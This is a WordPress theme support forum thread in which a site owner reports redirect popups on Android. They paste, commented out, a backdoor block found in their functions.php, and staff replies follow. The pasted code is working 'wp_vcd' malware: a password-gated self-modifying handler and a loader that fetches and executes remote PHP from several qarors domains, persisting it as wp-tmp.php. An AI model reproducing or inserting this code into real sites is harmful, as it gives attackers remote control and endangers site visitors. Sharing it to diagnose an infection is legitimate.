Home › Forums › WoodMart support forum › VIRUS POPUP PROBLEM ON ANDROID
VIRUS POPUP PROBLEM ON ANDROID
- This topic has 4 replies, 3 voices, and was last updated 5 years, 5 months ago by
Artem Temos.
-
AuthorPosts
-
June 15, 2019 at 6:28 am #128610
calitteParticipantHi there,
Last night I had a problem on android phone. When I clicked a link on my website, redirection a different add pop-up and there was a kind of virus. When I disabled a code block in my function.php file problem solved. But I do not understand the problem? Thanks for your helping.Have a nice day.
/* if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '12a9366e890ad01c2d708276b761712f')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='eb3c2118359826c30c3247531989f9c6'; if (($tmpcontent = @file_get_contents("http://www.qarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.qarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.qarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.qarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp */Attachments:
You must be logged in to view attached files.June 15, 2019 at 9:50 am #128634
Elise NoromitMemberHello,
Please enable the disabled code, deactivate all the plugins not related to the theme and switch the parent theme, check the issue, if the problem remains, leave the plugins not activated for us to check
Best Regards
June 15, 2019 at 12:09 pm #128649
calitteParticipantHi Elise,
I think you did not understand me. That is not a CSS code. Why can I add to CSS. And I use that theme and same plugin for 2 month. Why It happend after 2 month
June 15, 2019 at 4:36 pm #128672
Elise NoromitMemberHello,
1. Please provide the page URL and screen which link redirect to the popup?
2. How can I see the virus, have you tested it on a default theme?
3. I mean to make the theme files they are initially. Do not disable any theme default code.
Our theme does not generate any viruses, most likely you get the virus from one of your plugins.
Best Regards
June 17, 2019 at 6:17 am #128792
Artem TemosKeymasterProbably, somebody hacked your website and got access to your website files. It may be done via some problems with WordPress (if you don’t have the latest version) or via some vulnerability in your plugins. Now you need to check all files and clean from the code. Usually, server providers may help with such problems. Try to ask them for help.
-
AuthorPosts
- You must be logged in to create new topics. Login / Register